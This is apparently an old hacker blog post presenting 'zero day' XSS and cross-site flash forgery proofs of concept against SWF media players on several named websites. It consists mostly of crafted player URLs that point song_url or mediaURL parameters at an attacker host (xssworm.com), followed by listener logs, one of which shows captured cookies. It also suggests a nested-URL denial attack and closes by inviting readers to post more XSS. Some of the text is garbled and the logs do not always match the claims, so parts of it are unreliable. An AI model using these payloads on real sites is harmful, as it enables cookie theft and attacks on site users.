Zero Day Shockwave SWF Player Exploit with XSS Attack
Here we have some demonstration of proofs for XSS Scripting attacks and cross flash forgery on many sites.
Many hopes for our readers to leave some feedback on these serious vulnerabilities.
SWF Exploit 1.)
We make a hit with browser to target shockwave
http://alanakurtis.com/flash/musicplayer.swf?song_url=http://localhost/xssworm/&autoplay=true
but in a localhost is seen
Connect to [127.0.0.1] from localhost [127.0.0.1] 4131
GET /xssworm/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows ME; en-US; rv:1.3.3.8) Firefox/2.0.0.0–snip–
Keep-Alive: 300
Connection: keep-alive
..
(-;
Maybe the Blackhat attack to deny server users : host/flash/musicplayer.swf?song_url=host/flash/musicplayer.swf?song_url=host/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=xssworm.com
also browser says:
http://www.moanmyip.com/player.swf?song_url=http://localhost/xssworm?seo&autoplay=true
but in logger we are seeing:
Connect to [127.0.0.1] from localhost [127.0.0.1] 3831
GET /xssworm?seo HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows ME; en-US; rv:1.3.3.8) Firefox/2.0.0.0–snip–
Keep-Alive: 300
Connection: keep-alive
& in the hacking metacafe we discover Shockwave XSS 0day attack to use by blackhat to steal fish:
MetaCafe XSS Worm Vulnerability - 0-Day Shockwave Attack POC
Demo:
http://www.metacafe.com/f/fvp/EmbedVideoPlayer_5.1.0.0.swf?itemID=755028&mediaURL=http://xssworm.com/?fish&normalizedTitle=space_trip&isViral=false&isWatermarked=false&postrollContentURL=http://l3images.metacafe.com/f/fvp/EmbedItemSelector_3.0.0.5.swf&networkingAllowed=true&
We see logs outputs in XSSWORM.com ::
GET /crossdomain.xml HTTP/1.1
Host: metacafe.122.2o7.net
… snips…
Connection: keep-alive
Cookie: s_vi_xxhybx7BxBxxclx7Fx7D=[CS]v4|472A0D2D00060B2-290B2900004DB|472A0
D2D[CE]; s_vihfex7Ekx7Dx7Fzxx=[CS]v4|47208A0C00004D74-A170C5400003A87|472DA4DB[
CE]; s_vi_jdghjlgdijg=[CS]v4|472605E00007606-A170BAE000039DC|4726056DCE] s_vi
_wzvqcdsx7F7×60qx7isx7Fx7D=[CS]v4|473350E200004A7E-A000C800004398|473350E2[C
E]; s_vi_zox7Ekigx7Ex7De=[CS]v|47009D8E00027B7-A000B0400000F80|400A7C4[CE];
s_vi_kefx7Dhxxkdn=[CS]v4|4707E570000074C7-A1606500003648|47200DA4DB[CE]; s_vi_jd
ghjfxxliyo=[CS]v4|4726056E0000760-A00070BAE000039DC|4726056[CE]; svi_nyhylx7B89
x3E=[CS]v4|46FEC0DF0004AB3-A00B28000180|46FEC0D[CE]; s_vi_hfedldmx0×7B=[CS
]v4|4725839500005A8F-A160B1700007C|472605EC[CE]; s_vi_x7Dx6067zbhx7Dl=[CS]v4|4
6FEC0C4000077C6-A160B2100003DDF|4EC4EC0C4[CE]; s_vi_ox7Dyhex700Ffnoxx=[C]v4|4FEC0
BC00003E04-A000B000075F|46C0BBCE]; s_vi_pogx7F4k=[CS]v7208C000DB-A
290B5A000015EB|47208C61[CE]; s_vi_igdx7Fxxiae=[CS]v4|47225ED8000044DD-A140A36000
02900|47225ED7[CE]; s_vi_brcxxaabctrxxatkppc=[CS]v4|4709002200006037-A290A9D0000
6E2E|4717A488[CE]; s_vi_kefx7Dhndfyx7B=[CS]v4|470EE04300002808-A140A2500000049|4
70EE043[CE]; s_vi_chsts003DBF|4734B658[CE]; s_vi_svx7Cywxxdsux7Edbuqe=[CS]v4|47351D–
snips…
We see many more serious vulnerability in the web 2.0 today.
Hacker browses: http://www.liveleak.com/player.swf?song_url=http://localhost/hurr&autoplay=true
In server log:
connect to [127.0.0.1] from localhost [127.0.0.1] 1268
GET /urchin.js HTTP/1.1
Host: www.google-analytics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;)
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.liveleak.com/
(;
Please leave nice XSS comments.
